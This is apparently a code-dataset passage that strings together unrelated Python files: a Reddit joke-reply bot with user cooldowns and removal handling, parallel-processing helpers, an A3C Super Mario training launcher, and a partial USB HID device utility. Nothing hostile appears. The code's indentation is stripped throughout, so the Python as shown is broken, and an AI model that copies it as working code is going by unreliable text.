# Get latest users who the bot replied to
print("Looking for the latest replied users... ", end="", flush=True)
self.replied_users = dict() # Dictionary of users and the time of the last bot reply
self.user_cooldown = timedelta(seconds=user_cooldown) # How long to wait before user can get another reply (default: 1 day)
my_comments = self.reddit.user.me().comments.new() # Most recent comments of the bot
self.user_refresh = timedelta(seconds=user_refresh) # Minimum time to refresh the replied users list
for count, comment in enumerate(my_comments):
current_time = datetime.utcnow() # Time now
comment_time = datetime.fromtimestamp(comment.created_utc) # Time of the bot reply
comment_age = current_time - comment_time # Difference between the two times
if count == 0:
self.previous_post = comment.submission.name # Latest submission replied by bot
self.previous_reply_time = datetime.fromtimestamp( # Time of the latest bot reply
comment.created_utc
)
if comment_age < self.user_cooldown:
# Store the user ID and comment time if the bot reply was made within the cooldown period
replied_user = comment.submission.author.id
self.replied_users.update({replied_user: comment_time})
self.last_refresh = datetime.utcnow() # Store the time that the replied users list was built
print("Finished")
# Load blacklist of subreddits
print("Loading subreddits blacklist... ", end="", flush=True)
self.blacklist = set()
try:
with open("blacklist.txt", "r") as blacklist_file:
for line in blacklist_file:
self.blacklist.add(line.strip()) # Strip the text from the line break and spaces at both ends
print("Finished")
except FileNotFoundError:
print("No blacklist found")
# Load responses
print("Loading responses list... ", end="", flush=True)
self.temp_file = Path("temp.bin") # Temporary file for the responses in the queue
if self.temp_file.exists():
# Load the responses from the temporary file, if one exists
with open(self.temp_file, "rb") as temp:
self.responses = pickle.load(temp)
else:
# If not, then build the response queue from scratch
self.responses = deque()
self.refresh_responses()
print("Finished")
# Update the counter for the amount replies the bot has made so far
print("Updating bot replies counter... ", end="", flush=True)
self.reply_counter = counter_start
self.reply_counter_session = 0 # Replies during the current bot session
self.log_file_name = "chickenbot_log.txt"
try:
with open(self.log_file_name, "r") as log_file:
# Count the lines on the log file
for line in log_file:
if line.strip(): # Do not count blank lines
self.reply_counter += 1
except FileNotFoundError:
pass
print("Finished")
# Interval to check for private messages
self.message_wait = message_wait
self.running = True # Indicate to the threads that the bot is running
separator = "".ljust(get_terminal_size().columns - 1, "-")
print(f"ChickenBot has started! Bot is now running.\n{separator}")
def refresh_responses(self):
"""Once all responses have been used, this method is called for
rebuilding the responses queue"""
# Read the responses from the file and append them to the queue
with open("responses.txt", "r", encoding="utf-8") as responses_file:
for line in responses_file:
self.responses.append(line.strip())
# Randomize the order of the responses
shuffle(self.responses)
# Create the temporary file for the responses queue
self.save_temp()
def save_temp(self):
"""Saves a temporary file for the responses queue.
This allows the bot, when restarted, to continue from where it stopped."""
# Create the temporary file with the responses queue
with open(self.temp_file, "wb") as temp:
pickle.dump(self.responses, temp)
def submission_testing(self, submission):
"""Checks whether a submission passes the checks for getting a reply.
All checks must pass: post made after bot's previous reply, question in
the title, subreddit not on blacklist, author didn't get a ChickenBot's
reply within the last day (default)."""
# Was the submission made after the last bot reply?
post_time = datetime.fromtimestamp(submission.created_utc)
if post_time < self.previous_reply_time:
return False
# Is the question on the title?
title = submission.title.lower()
if self.question not in title:
return False
# Is the post made on a non-blacklisted subreddit?
subreddit_id = submission.subreddit.name
if subreddit_id in self.blacklist:
return False
# The author must not have gotten a reply from this bot recently (default: less than 24 hours ago)
self.refresh_authors() # Update the recently replied users list (default: less than 1 day)
user_id = submission.author.id # Get the ID of the current replied user
if user_id in self.replied_users: # If the user is on the recent list
reply_time = self.replied_users[user_id] # Last time the user got a reply from this bot
reply_age = datetime.utcnow() - reply_time # How long has passed since then
if reply_age < self.user_cooldown: # Whether the comment age is smaller than the cooldown period
return False
# Return True when all checks passed
return True
def refresh_authors(self):
"""Remove from the replied authors dictionary those authors who got the last
reply for longer than the cooldown period (default 1 day).
The check is run each 30 minutes (by default)."""
# Check if the minimum refresh period has passed
last_refresh_age = datetime.utcnow() - self.last_refresh
# Exit the function if the minimum refresh time has not passed (default: 30 minutes)
if last_refresh_age < self.user_refresh:
return
# Loop through the replied users dictionary
authors_to_remove = set()
for user_id, time in self.replied_users.items():
# How long ago the user got a reply from this bot
reply_age = datetime.utcnow() - time
# Whether that reply is older than the cooldown period (default: 1 day)
if reply_age >= self.user_cooldown:
authors_to_remove.add(user_id) # Queue to remove the user from the dictionary if the cooldown period has passed
"""NOTE
Deleting a dictionary item during the its own iteration throws a RuntimeError.
So instead I am storing their ids to remove from the dict after the loop.
"""
# Remove the authors whose cooldown period expired
if authors_to_remove:
for user_id in authors_to_remove:
del self.replied_users[user_id]
def make_reply(self, submission):
"""The bot gets a response from the queue and post a reply to the post.
Once all responses have been used, the queue is rebuilt. This way the
bot only repeats the same response after all others have been used
at least once."""
# Whether the response queue is empty
if not self.responses:
# Reload the responses list when all responses have been used
self.refresh_responses()
# Get and remove a response from the queue
response = self.responses.pop().replace("\\n", "\n\n")  # assumes responses.txt marks paragraph breaks with a literal "\n"
self.save_temp()
# Build the reply text
header = ">Why did the chicken cross the road?\n\n"
footer = f"\n\n---\n\n^(This is an automatic comment made by a bot, who has answered so far to {self.reply_counter+1} doubts concerning gallinaceous roadgoing birds.)"
reply_text = f"{header}{response}{footer}"
# Posting the reply
try:
#print(f"{submission.title}\n{reply_text}\n----------\n")
my_comment = submission.reply(reply_text) # Submit the reply
self.reply_counter += 1 # Increase the reply counter
self.reply_counter_session += 1
self.has_replied = True # Flag that the bot has replied on the current cycle
# Add user to the replied users dictionary
self.replied_users[submission.author.id] = datetime.utcnow()
# Log to file the bot comment
with open(self.log_file_name, "a", encoding="utf-8") as log_file:
current_time = str(datetime.utcnow())[:19] # Current date and time as string (The [:19] slice strips the fractional part of the seconds)
username = submission.author.name # Get the post author's username
link = my_comment.permalink # Reddit link to the bot comment
log_text = f"{current_time}\tu/{username}\t{link}\n" # Text to be written on the log file
log_file.write(log_text) # Write the log file
print("OK:", log_text, end="") # Print the logged text to the terminal
# Generate link so the original poster can delete the comment
# (the 'urllib.parse.quote()' function escapes special characters and spaces)
message_subject = quote("Removal of ChickenBot's comment", safe="")
message_body = quote(f"Please remove {link}\n\n[do not edit the first line]", safe="")
removal_link = f"/message/compose/?to=u%2FChickenRoad_Bot&subject={message_subject}&message={message_body}"
# Edit the comment to append the removal link
edited_comment = my_comment.body + f"^( If you are the thread's author, you can )[^(click here)]({removal_link})^( to delete this comment.)"
sleep(5)
my_comment.edit(edited_comment)
except Forbidden as error: # If the bot didn't have permission to reply to the post
# Log the forbidden post to file
with open("forbiden_log.txt", "a", encoding="utf-8") as log_file:
current_time = str(datetime.utcnow())[:19] # Current date and time
username = submission.author.name # Get the post author's username
link = submission.permalink # Reddit link to the submission
log_text = f"{current_time}\tu/{username}\t{link}\t{error}\n" # Text to be written on the log file
log_file.write(log_text) # Write the log file
print("FORBIDEN:", log_text, end="") # Print the logged text to the terminal
except PrawcoreException as error: # If some other problem happened
current_time = str(datetime.utcnow())[:19]
# username/link may not have been set yet if the reply itself failed, so derive them defensively
username = getattr(getattr(submission, "author", None), "name", "[unknown]")
link = getattr(submission, "permalink", "[unknown]")
log_text = f"{current_time}\tu/{username}\t{link}\t{error}\n"
print("Failed:", log_text, end="")
with open("forbiden_log.txt", "a", encoding="utf-8") as log_file:
log_file.write(log_text)
my_exception = format_exc()
my_date = current_time + "\n\n"
with open("error_log.txt", "a", encoding="utf-8") as error_log:
error_log.write(my_date)
error_log.write(my_exception)
error_log.write("\n\n---------------\n")
def check_submissions(self):
"""Look for submissions for replying to."""
while self.running:
# Track whether the bot has replied this cycle
self.has_replied = False
# Search for posts with the question made after the previous search
lookup = self.subreddit.search(
self.query, # Search query for the question
sort="new", # Sorted by newest posts
# params={"before":self.previous_post}, # Made after the newest post found
)
# Loop through the found posts
try:
for count, submission in enumerate(lookup):
# Store the ID of the newest post
if count == 0:
self.previous_post = submission.name
# Check whether the post fits the criteria for getting a reply
if not self.submission_testing(submission):
continue
# Make a reply
self.make_reply(submission)
sleep(5)
# Connection to the Reddit server failed
except (PrawcoreException, RedditAPIException) as error:
current_time = str(datetime.utcnow())[:19]
print("Warning:", current_time, error)
my_exception = format_exc()
my_date = str(datetime.now())[:19] + "\n\n"
with open("error_log.txt", "a", encoding="utf-8") as error_log:
error_log.write(my_date)
error_log.write(my_exception)
error_log.write("\n\n---------------\n")
# Update the last reply time if the bot has replied this cycle
if self.has_replied:
self.previous_reply_time = datetime.utcnow()
# Wait for one hour (default) before searching again for posts
sleep(self.wait)
def private_messages(self):
"""Listens to the bot account's private chat, in order to process removal requests."""
# Regular expression to extract the comment ID from the message body
message_regex = re.compile(r"remove /r/.+?/comments/.+?/.+?/(\w+)")
# Bot's user ID
my_id = self.reddit.user.me().fullname
# Check for new private messages
while self.running:
try:
private_inbox = self.reddit.inbox.messages()
for message in private_inbox:
# Skip the message if it has already been read
if not message.new: continue
# Mark the message as "read"
message.mark_read()
# Get the author and the requested comment
message_author_id = message.author_fullname
message_author = self.reddit.redditor(fullname=message_author_id)
if message_author is None: continue
# Get the comment ID from the message
search = message_regex.search(message.body)
if search is None: continue
comment_id = search.group(1)
try:
# Get the parameters of the comment's thread
comment = self.reddit.comment(comment_id)
post_id = comment.link_id.split("_")[1]
post = self.reddit.submission(post_id)
post_title = post.title
post_url = post.permalink
post_author_id = post.author_fullname
except (ClientException, AttributeError):
# If the comment was not found
if "remov" in message.subject:
message_author.message(
subject = "ChickenBot comment removal",
message = f"Sorry, the requested comment '{comment_id}' could not be found. Possibly it was already deleted."
)
continue
# Permanent link to the comment
comment_url = comment.permalink
# Verify the author and respond
if post_author_id == message_author_id:
# Delete the comment if the request came from the post's author
# Check if the bot is the comment's author
if comment.author_fullname == my_id:
comment.delete()
message_author.message(
subject = "ChickenBot comment removed",
message = f"The bot has deleted [its comment]({comment_url}) from your post [{post_title}]({post_url}).\n\nSorry for any inconvenience that the bot might have caused."
)
# The bot won't post to this author's threads for the duration of their cooldown time
self.replied_users[post.author.id] = datetime.utcnow()
else:
message_author.message(
subject = "ChickenBot comment removal",
message = "Sorry, the bot can only delete comments made by itself."
)
else:
# Refuse to delete if it was someone else who requested
message_author.message(
subject = "ChickenBot comment",
message = f"Sorry, only the original poster u/{post.author.name} can request the removal of [my comment]({comment_url}) on the thread [{post_title}]({post_url})."
)
# Logs the error if something wrong happens while handling messages
# (probably Reddit was down or the user blocked the bot)
except (PrawcoreException, RedditAPIException) as error:
current_time = str(datetime.utcnow())[:19]
print("Warning:", current_time, error)
my_exception = format_exc()
my_date = str(datetime.now())[:19] + "\n\n"
with open("error_log.txt", "a", encoding="utf-8") as error_log:
error_log.write(my_date)
error_log.write(my_exception)
error_log.write("\n\n---------------\n")
# Wait for some time before checking for new private messages
sleep(self.message_wait)
def main(self):
"""Main loop of the program"""
# Create threads for the listeners
submissions_listener = Thread(target=self.check_submissions)
messages_listener = Thread(target=self.private_messages)
# Set the threads to 'daemonic'
# (daemon threads do not prevent their parent program from exiting)
submissions_listener.daemon = True
messages_listener.daemon = True
# Begin the child threads
submissions_listener.start()
messages_listener.start()
# Catch a keyboard interrupt, so the threads can terminate and the program exit
signal(SIGINT, self.clean_exit)
while True:
submissions_listener.join(1)
messages_listener.join(1)
"""NOTE
In Python, there isn't any actual 'clean' way to terminate a thread.
By default, a KeyboardInterrupt is caught by an arbitrary thread,
while others remain running.
Using the signal() function forces the main thread to catch the interrupt.
Then the bot sets the 'self.running' flag to False, which makes its child
threads exit their loops.
Finally, the whole program exits.
"""
def clean_exit(self, *args):
"""Close the program."""
self.running = False
raise SystemExit
if __name__ == "__main__":
try:
bot = ChickenBot()
bot.main()
except (SystemExit, KeyboardInterrupt):
print(f"\nBot stopped running. ({bot.reply_counter} replies in total, {bot.reply_counter_session} in this session)")
|
parallel.py
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/03a_parallel.ipynb (unless otherwise specified).
__all__ = ['threaded', 'startthread', 'set_num_threads', 'ThreadPoolExecutor', 'ProcessPoolExecutor', 'parallel',
'run_procs', 'parallel_gen']
# Cell
from .imports import *
from .foundation import *
from .basics import *
from .xtras import *
from functools import wraps
# from contextlib import contextmanager,ExitStack
from multiprocessing import Process, Queue
import concurrent.futures,time
from multiprocessing import Manager
from threading import Thread
# Cell
def threaded(f):
"Run `f` in a thread, and returns the thread"
@wraps(f)
def _f(*args, **kwargs):
res = Thread(target=f, args=args, kwargs=kwargs)
res.start()
return res
return _f
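# Illustrative usage (a sketch, not part of the exported API): the decorated
# function returns the already-started Thread, which the caller may join.
#
#   @threaded
#   def _say(msg): print(msg)
#   t = _say("hello")   # runs in a background thread
#   t.join()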
# Cell
def startthread(f):
"Like `threaded`, but start thread immediately"
threaded(f)()
# Cell
def set_num_threads(nt):
"Get numpy (and others) to use `nt` threads"
try: import mkl; mkl.set_num_threads(nt)
except: pass
try: import torch; torch.set_num_threads(nt)
except: pass
os.environ['IPC_ENABLE']='1'
for o in ['OPENBLAS_NUM_THREADS','NUMEXPR_NUM_THREADS','OMP_NUM_THREADS','MKL_NUM_THREADS']:
os.environ[o] = str(nt)
# Cell
def _call(lock, pause, n, g, item):
l = False
if pause:
try:
l = lock.acquire(timeout=pause*(n+2))
time.sleep(pause)
finally:
if l: lock.release()
return g(item)
# Cell
class ThreadPoolExecutor(concurrent.futures.ThreadPoolExecutor):
"Same as Python's ThreadPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
class ProcessPoolExecutor(concurrent.futures.ProcessPoolExecutor):
"Same as Python's ProcessPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
try: from fastprogress import progress_bar
except: progress_bar = None
# Cell
def parallel(f, items, *args, n_workers=defaults.cpus, total=None, progress=None, pause=0,
threadpool=False, timeout=None, chunksize=1, **kwargs):
"Applies `func` in parallel to `items`, using `n_workers`"
pool = ThreadPoolExecutor if threadpool else ProcessPoolExecutor
with pool(n_workers, pause=pause) as ex:
r = ex.map(f,items, *args, timeout=timeout, chunksize=chunksize, **kwargs)
if progress and progress_bar:
if total is None: total = len(items)
r = progress_bar(r, total=total, leave=False)
return L(r)
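# Illustrative usage (a sketch): `parallel` maps a top-level function over items
# with a process pool by default, or a thread pool when `threadpool=True`;
# `n_workers=0` falls back to serial execution with the same API.
#
#   def inc(x): return x + 1
#   parallel(inc, [1, 2, 3], n_workers=2)    # -> L of results
#   parallel(inc, [1, 2, 3], n_workers=0)    # serial, same result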
# Cell
def run_procs(f, f_done, args):
"Call `f` for each item in `args` in parallel, yielding `f_done`"
processes = L(args).map(Process, args=arg0, target=f)
for o in processes: o.start()
yield from f_done()
processes.map(Self.join())
# Cell
def _f_pg(obj, queue, batch, start_idx):
for i,b in enumerate(obj(batch)): queue.put((start_idx+i,b))
def _done_pg(queue, items): return (queue.get() for _ in items)
# Cell
def parallel_gen(cls, items, n_workers=defaults.cpus, **kwargs):
"Instantiate `cls` in `n_workers` procs & call each on a subset of `items` in parallel."
if n_workers==0:
yield from enumerate(list(cls(**kwargs)(items)))
return
batches = L(chunked(items, n_chunks=n_workers))
idx = L(itertools.accumulate(0 + batches.map(len)))
queue = Queue()
if progress_bar: items = progress_bar(items, leave=False)
f=partial(_f_pg, cls(**kwargs), queue)
done=partial(_done_pg, queue, items)
yield from run_procs(f, done, L(batches,idx).zip())
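# Illustrative usage (a sketch): `parallel_gen` expects a class whose instances
# are callable on a batch of items; it yields (index, result) pairs as workers
# finish, so the original order can be restored from the index.
#
#   class _Square:
#       def __call__(self, batch): return [x * x for x in batch]
#   results = dict(parallel_gen(_Square, range(8), n_workers=2))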
|
main.py
|
import os
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import torch
from src.env import create_train_env
from src.model import ActorCritic
from src.optimizer import GlobalAdam
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=5e6)
parser.add_argument("--num_processes", type=int, default=6)
parser.add_argument("--save_interval", type=int, default=500, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--saved_path", type=str, default="trained_models")
parser.add_argument("--load_from_previous_stage", type=bool, default=False,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
opt = parser.parse_args()
if __name__ == "__main__":
torch.manual_seed(123)
if os.path.isdir(opt.log_path):
shutil.rmtree(opt.log_path)
os.makedirs(opt.log_path)
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage, opt.action_type)
global_model = ActorCritic(num_states, num_actions)
if opt.use_gpu:
global_model.cuda()
global_model.share_memory()
if opt.load_from_previous_stage:
if opt.stage == 1:
previous_world = opt.world - 1
previous_stage = 4
else:
previous_world = opt.world
previous_stage = opt.stage - 1
file_ = "{}/a3c_super_mario_bros_{}_{}".format(opt.saved_path, previous_world, previous_stage)
if os.path.isfile(file_):
global_model.load_state_dict(torch.load(file_))
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
process.start()
processes.append(process)
for process in processes:
process.join()
|
bsl.py
|
#!/usr/bin/python3
# C:\Work\Python\HID_Util\src\HID_recorder.py
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
import include_dll_path
import hid
# import os
# BOARD_TYPE_MAIN = 0,
# BOARD_TYPE_JOYSTICKS = 1,
# BOARD_TYPE_TOOLS_MASTER = 2,
# BOARD_TYPE_STATION = 3,
# BOARD_TYPE_SUITE2PRIPH = 4,
# BOARD_TYPE_TOOLS_SLAVE = 5,
# BOARD_TYPE_GBU = 6,
# BOARD_TYPE_LAP = 7
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller
PRODUCT_ID_CTAG = 0x1005 # Simbionix MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
FILE1_PATH = "log\hid_log.csv"
# if not os.path.exists('log'):
# os.makedirs('log')
# file1 = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
# file1 = open(FILE1_PATH,"w")
# file1 = open("log\hid_log.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
INSERTION_INDEX = 2 + 8
TORQUE_INDEX = 2 + 4
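# For reference (mirroring the decode expressions used in gui_loop/handler below):
# 16-bit fields are stored little-endian in the 64-byte report, e.g.
#   counter = (value[COUNTER_INDEX + 1] << 8) | value[COUNTER_INDEX]
# while the 32-bit torque/insertion values are assembled from four bytes and
# sign-corrected when they exceed 2**31.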
HID_STREAM_CHANNEL1_STYLE = "HIDStreamChannel1"
HID_STREAM_CHANNEL2_STYLE = "HIDStreamChannel2"
INNER_HANDLE_CHANNEL1_STYLE = "InnerHandleChannel1"
INNER_HANDLE_CHANNEL2_STYLE = "InnerHandleChannel2"
CLICKER_STYLE = "Clicker"
SLEEPTIMER_STYLE = "sleepTimer"
BATTERY_LEVEL_STYLE = "batteryLevel"
MOTOR_CURRENT_STYLE = "motorCurrent"
style_names = [
HID_STREAM_CHANNEL1_STYLE,
HID_STREAM_CHANNEL2_STYLE,
INNER_HANDLE_CHANNEL1_STYLE,
INNER_HANDLE_CHANNEL2_STYLE,
CLICKER_STYLE,
SLEEPTIMER_STYLE,
BATTERY_LEVEL_STYLE,
MOTOR_CURRENT_STYLE
]
# global variables
progressbar_styles = list()
progressbars = list()
inner_clicker = list()
red_handle = list()
reset_check = list()
counter_entry = list()
clicker_counter_entry = list()
fault_entry = list()
special_cmd = 0
ignore_red_handle_button = None
ignore_red_handle_checkbutton = None
ignore_red_handle_state = False
root = None
def update_checkbox(checkbox, bool_value):
if (bool_value):
checkbox.select()
else:
checkbox.deselect()
def streaming_button_CallBack():
global special_cmd
global ignore_red_handle_state
special_cmd = 'I'
ignore_red_handle_state = True
def board_type_button_callback():
global special_cmd
special_cmd = 'S'
def alive_button_CallBack():
global special_cmd
special_cmd = 'A'
def moderate_button_CallBack():
global special_cmd
special_cmd = 'M'
def BSL_mode_button_CallBack():
global special_cmd
special_cmd = 'B'
def gui_loop(device):
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
# cnt = None
# prev_cnt = None
# value = None
global special_cmd
global WRITE_DATA
# global print_flag
while True:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
# elif special_cmd == 'A':
# WRITE_DATA = WRITE_DATA_CMD_A
# print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
elif special_cmd == 'B':
WRITE_DATA = WRITE_DATA_CMD_B
device.write(WRITE_DATA)
print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
# # device.write(WRITE_DATA)
if WRITE_DATA == WRITE_DATA_CMD_B:
break
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
# If not enough time has passed, sleep for SLEEP_AMOUNT seconds
sleep_time = SLEEP_AMOUNT - (cycle_time)
# if (timer() - time) < SLEEP_AMOUNT:
# if value:
# prev_cnt = cnt
# cnt = value[COUNTER_INDEX]
# if prev_cnt and cnt < prev_cnt:
# print("Invalid counter")
# sleep(SLEEP_AMOUNT)
# Measure the time
time = timer()
# print(" ")
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
# global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
# file1.writelines(L)
# handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
Handler_Called = (timer() - handle_time)
if Handler_Called > 0.002 :
# if Handler_Called > 0.02 :
#print("handler called: %.6f" % Handler_Called)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
